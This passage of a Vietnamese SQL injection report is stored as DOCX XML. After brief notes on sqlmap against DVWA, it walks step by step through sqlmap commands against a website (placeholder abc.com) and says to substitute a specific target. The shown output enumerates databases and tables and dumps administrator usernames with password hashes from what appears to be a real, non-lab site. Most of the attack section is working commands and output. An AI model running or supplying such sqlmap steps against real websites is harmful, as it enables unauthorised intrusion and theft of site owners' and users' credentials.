    <w:p w14:paraId="64BC2133" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>Sqlmap successfully retrieves the entries from the “user” and “password” columns in the “users” table of the DVWA database. It asks if hashes can be stored (default: no) and offers to crack them using a dictionary attack (default: yes). SQLmap launches the attack using the “wordlist.txt” file (default) or a custom dictionary if specified. It also asks about using common password suffixes (default: no).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20528AA7" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>Sqlmap cracks the password hashes using a dictionary-based attack and outputs the plaintext passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E21E752" w14:textId="0AEE846B" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C951F8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc175580491"/>
      <w:bookmarkStart w:id="13" w:name="_Toc175587846"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="001B783D">
        <w:t>Tấn công SQL Injection website abc.com</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="25B41DC4" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:t>Tìm kiếm database đang được sử dụng: Thay abc.com bằng website cụ thể</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E6AE1D" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>user@vmkali:~$ sqlmap -u http://abc.com/constructionDetail.php?id=334 --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B25411" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:lastRenderedPageBreak/>
        <w:t>[17:43:15] [INFO] the back-end DBMS is MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614FFF98" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>web server operating system: Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550D47F4" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>web application technology: PHP 5.2.6, Apache 2.2.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E3E65" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>back-end DBMS: MySQL &gt;= 5.0.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FC91F7" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:15] [INFO] fetching database names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54789283" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:15] [INFO] used SQL query returns 5 entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30998701" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:15] [INFO] retrieved: 'information_schema'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDCFBEC" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:15] [INFO] retrieved: 'toto'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B935F3" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:15] [INFO] retrieved: 'mysql'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20575B02" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:15] [INFO] retrieved: 'phpmyadmin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B2A40" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:16] [INFO] retrieved: 'test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A0C0E1" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">available databases [5]:                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A14333B" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[*] information_schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE40D1" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[*] toto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C09585C" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[*] mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8F915F" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[*] phpmyadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C8BC16" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[*] test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE451EA" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">Ta có được database của trang web là </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>toto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74274124" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:t>Lập danh sách các table trong database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FAF8B1" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>user@vmkali:~$</w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlmap -u http://abc.com/constructionDetail.php?id=334 -D toto --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57236675" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="00C66B15" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C66B15">
        <w:t>[17:43:32] [INFO] fetching tables for database: 'toto'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E6D46" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="00C66B15" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C66B15">
        <w:t>[17:43:33] [WARNING] reflective value(s) found and filtering out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E52D6F2" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="00C66B15" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C66B15">
        <w:t>[17:43:33] [WARNING] frames detected containing attacked parameter values. Please be sure to test those separately in case that attack on this page fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0CC473" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="00C66B15" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C66B15">
        <w:t>[17:43:33] [INFO] used SQL query returns 23 entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D95501" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="00C66B15" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C66B15">
        <w:t>[17:43:34] [INFO] retrieved: 'aboutus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239EF07D" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="00C66B15" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C66B15">
        <w:t>[17:43:34] [INFO] retrieved: 'account'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237CBF2F" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:34] [INFO] retrieved: 'account_ext'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF2467" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:35] [INFO] retrieved: 'accpriv'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667D4D09" w14:textId="1FB17060" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00643964" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700139D1" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:39] [INFO] retrieved: 'support_setting_config'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A14082D" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:40] [INFO] retrieved: 'support_setting_config_group'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8A8CEC" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:43:40] [INFO] retrieved: 'tuyendung'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774D2D32" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">Database: toto                                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CBD3EB" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[23 tables]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348DC8D8" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>+------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5EE494" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>| aboutus                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5973E100" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>| account                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8B91AB" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>| account_ext                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6030B3" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>| accpriv                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B392C3A" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>| codong                       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C91C9D" w14:textId="723FA08C" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00643964" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655B8F92" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>| support_setting_config_group |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049FBA65" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>| tuyendung                    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBE6CCF" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>+------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A614346" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t>Ta có được list các bảng  của database này. Ta thấy bảng account là 1 bảng chứa những thông tin quan trọng nên ta sẽ tập trung khai thác bảng này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305EBADC" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t> c.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">Lấy ra các column trong bảng </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D334903" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">user@vmkali:~$ </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sqlmap -u http://abc.com/constructionDetail.php?id=334 -D toto -T account --columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7384CFAE" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t>Đây là danh sách các column trong bảng này. Ta thấy có 2 column quan trọng là username và user_password ở đây nên hãy thử tấn công để tìm ra 2 thông tin này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49202D03" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:t>Cho ra danh sách username và password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726BAE05" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">user@vmkali:~$ </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sqlmap -u http://abc.com/constructionDetail.php?id=334 -D toto -T account -C username,user_password --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FFDF2B" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:lastRenderedPageBreak/>
        <w:t>[17:44:20] [INFO] used SQL query returns 2 entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E213716" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:44:20] [INFO] retrieved: 'b0d38fb7d75823691b324f4df8bbea06','Administrator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4AFEE3" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[17:44:20] [INFO] retrieved: '7d27e2e42ebb5a8e51e124cb18c29352','AdminToto'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072137A4" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">[17:44:20] [INFO] recognized possible password hashes in column 'user_password'                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206034B8" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D33BC8" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>do you want to crack them via a dictionary-based attack? [Y/n/q] n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A91F54" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>Database: toto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A23B1C7" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>Table: account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46681E72" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>[2 entries]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364DEB2" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>+---------------+----------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC01FFD" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>| username      | user_password                    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38981822" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>+---------------+----------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE2A77E" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>| Administrator | b0d38fb7d75823691b324f4df8bbea06 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B407021" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>| AdminToto   | 7d27e2e42ebb5a8e51e124cb18c29352 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A7649" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>+---------------+----------------------------------+</w:t>
      </w:r>
    </w:p>
